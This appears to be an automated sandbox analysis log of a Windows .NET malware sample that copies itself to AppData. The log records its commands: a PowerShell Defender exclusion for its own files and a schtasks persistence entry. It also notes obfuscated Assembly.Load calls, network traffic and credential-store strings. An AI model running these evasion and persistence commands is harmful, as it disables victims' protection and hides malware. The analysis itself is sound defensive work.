                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exe, Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: I5pvP0CU6M.exe, 00000009.00000002.2325569956.0000000002F7B000.00000004.00000800.00020000.00000000.sdmp, I5pvP0CU6M.exe, 00000009.00000002.2325569956.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp, I5pvP0CU6M.exe, 00000009.00000002.2325569956.0000000003067000.00000004.00000800.00020000.00000000.sdmp, tmp5F71.tmp.9.dr, tmp2B8.tmp.17.dr, tmp53D5.tmp.17.dr, tmpF22E.tmp.9.dr, tmp3B4E.tmp.17.dr, tmpF23E.tmp.9.dr, tmp8E21.tmp.17.dr, tmp3B5E.tmp.17.dr, tmp5F4E.tmp.9.dr, tmpBB6C.tmp.9.dr, tmpBB5B.tmp.9.dr, tmp2A7.tmp.17.dr, tmpF22D.tmp.9.dr, tmp5F82.tmp.9.dr, tmp5F5F.tmp.9.dr, tmp8E34.tmp.17.dr, tmp8E22.tmp.17.dr, tmp5F4F.tmp.9.dr, tmp296.tmp.17.dr, tmp2B7.tmp.17.dr, tmp5F70.tmp.9.dr, tmpBB5C.tmp.9.dr, tmp8E11.tmp.17.dr, tmp8E33.tmp.17.dr
                    Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                    Source: I5pvP0CU6M.exe, ReversingLabs: Detection: 68%
                    Source: I5pvP0CU6M.exe, Virustotal: Detection: 65%
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exe, File read: C:\Users\user\Desktop\I5pvP0CU6M.exe
                    Source: unknown, Process created: C:\Users\user\Desktop\I5pvP0CU6M.exe "C:\Users\user\Desktop\I5pvP0CU6M.exe"
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exe, Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\I5pvP0CU6M.exe"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exe, Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\VcihjWRO.exe"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exe, Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VcihjWRO" /XML "C:\Users\user\AppData\Local\Temp\tmp4733.tmp"
                    Source: C:\Windows\SysWOW64\schtasks.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exe, Process created: C:\Users\user\Desktop\I5pvP0CU6M.exe "C:\Users\user\Desktop\I5pvP0CU6M.exe"
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: unknown, Process created: C:\Users\user\AppData\Roaming\VcihjWRO.exe C:\Users\user\AppData\Roaming\VcihjWRO.exe
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exe, Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VcihjWRO" /XML "C:\Users\user\AppData\Local\Temp\tmp7075.tmp"
                    Source: C:\Windows\SysWOW64\schtasks.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exe, Process created: C:\Users\user\AppData\Roaming\VcihjWRO.exe "C:\Users\user\AppData\Roaming\VcihjWRO.exe"
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exe, Process created: C:\Users\user\AppData\Roaming\VcihjWRO.exe "C:\Users\user\AppData\Roaming\VcihjWRO.exe"
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeSection loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeSection loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeSection loaded: wldp.dll
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeSection loaded: profapi.dll
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeSection loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeSection loaded: dwrite.dll
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeSection loaded: windowscodecs.dll
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeSection loaded: amsi.dll
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeSection loaded: userenv.dll
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeSection loaded: msasn1.dll
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeSection loaded: gpapi.dll
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeSection loaded: textshaping.dll
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeSection loaded: iconcodecservice.dll
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeSection loaded: propsys.dll
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeSection loaded: edputil.dll
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeSection loaded: urlmon.dll
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeSection loaded: iertutil.dll
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeSection loaded: srvcli.dll
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeSection loaded: netutils.dll
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeSection loaded: windows.staterepositoryps.dll
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeSection loaded: wintypes.dll
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeSection loaded: appresolver.dll
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeSection loaded: bcp47langs.dll
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeSection loaded: slc.dll
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeSection loaded: sppc.dll
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeSection loaded: onecorecommonproxystub.dll
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeSection loaded: onecoreuapcommonproxystub.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeSection loaded: mscoree.dll
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeSection loaded: version.dll
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeSection loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeSection loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeSection loaded: wldp.dll
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeSection loaded: profapi.dll
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeSection loaded: rasapi32.dll
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeSection loaded: rasman.dll
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeSection loaded: rtutils.dll
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeSection loaded: mswsock.dll
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeSection loaded: winhttp.dll
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeSection loaded: iphlpapi.dll
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeSection loaded: dhcpcsvc6.dll
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeSection loaded: dhcpcsvc.dll
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeSection loaded: dnsapi.dll
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeSection loaded: winnsi.dll
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeSection loaded: rasadhlp.dll
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeSection loaded: fwpuclnt.dll
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeSection loaded: secur32.dll
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeSection loaded: schannel.dll
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeSection loaded: mskeyprotect.dll
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeSection loaded: ntasn1.dll
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeSection loaded: ncrypt.dll
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeSection loaded: ncryptsslp.dll
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeSection loaded: msasn1.dll
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeSection loaded: gpapi.dll
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeSection loaded: userenv.dll
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeSection loaded: ntmarta.dll
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeSection loaded: wbemcomn.dll
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeSection loaded: amsi.dll
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeSection loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeSection loaded: windowscodecs.dll
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exe, Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                    Source: Window Recorder, Window detected: More than 3 window changes detected
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exe, File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                    Source: I5pvP0CU6M.exe, Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: I5pvP0CU6M.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                    Data Obfuscation

                    Source: 0.2.I5pvP0CU6M.exe.3d25ad0.1.raw.unpack, XlF5VlCIHRSQX8M5eh.cs, .Net Code: _200C_200C_202D_206C_200B_206A_206D_200B_200D_200C_202D_206A_206D_202A_206A_206B_202B_206C_202D_200B_202E_202B_202A_206C_206A_206D_202D_206B_206D_206B_200D_202B_202D_206C_206F_206C_200B_202B_206A_206D_202E System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.I5pvP0CU6M.exe.46b1cd0.4.raw.unpack, xJpQPIrqp0EqOJe24h.cs, .Net Code: klkHZpY7O7 System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.I5pvP0CU6M.exe.73d0000.5.raw.unpack, XlF5VlCIHRSQX8M5eh.cs, .Net Code: _200C_200C_202D_206C_200B_206A_206D_200B_200D_200C_202D_206A_206D_202A_206A_206B_202B_206C_202D_200B_202E_202B_202A_206C_206A_206D_202D_206B_206D_206B_200D_202B_202D_206C_206F_206C_200B_202B_206A_206D_202E System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.I5pvP0CU6M.exe.7880000.6.raw.unpack, xJpQPIrqp0EqOJe24h.cs, .Net Code: klkHZpY7O7 System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.I5pvP0CU6M.exe.470b2f0.3.raw.unpack, xJpQPIrqp0EqOJe24h.cs, .Net Code: klkHZpY7O7 System.Reflection.Assembly.Load(byte[])
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exe, Code function: 0_2_058D92DF push B00531A5h; iretd 0_2_058D92ED
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exe, Code function: 17_2_06BCE5CF push es; ret 17_2_06BCE5E0
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exe, Code function: 17_2_06BC1810 push es; ret 17_2_06BC1820
                    Source: I5pvP0CU6M.exe, Static PE information: section name: .text entropy: 7.711719915976035
                    Source: VcihjWRO.exe.0.dr, Static PE information: section name: .text entropy: 7.711719915976035
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exe, File created: C:\Users\user\AppData\Roaming\VcihjWRO.exe

                    Boot Survival

                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exe, Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VcihjWRO" /XML "C:\Users\user\AppData\Local\Temp\tmp4733.tmp"

                    Hooking and other Techniques for Hiding and Protection

                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: unknown Network traffic detected: HTTP traffic on port 49718 -> 55615
                    Source: unknown Network traffic detected: HTTP traffic on port 55615 -> 49718
                    Source: unknown Network traffic detected: HTTP traffic on port 49777 -> 55615
                    Source: unknown Network traffic detected: HTTP traffic on port 49784 -> 55615
                    Source: unknown Network traffic detected: HTTP traffic on port 55615 -> 49784
                    Source: unknown Network traffic detected: HTTP traffic on port 55615 -> 49777
                    Source: unknown Network traffic detected: HTTP traffic on port 49837 -> 55615
                    Source: unknown Network traffic detected: HTTP traffic on port 55615 -> 49837
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
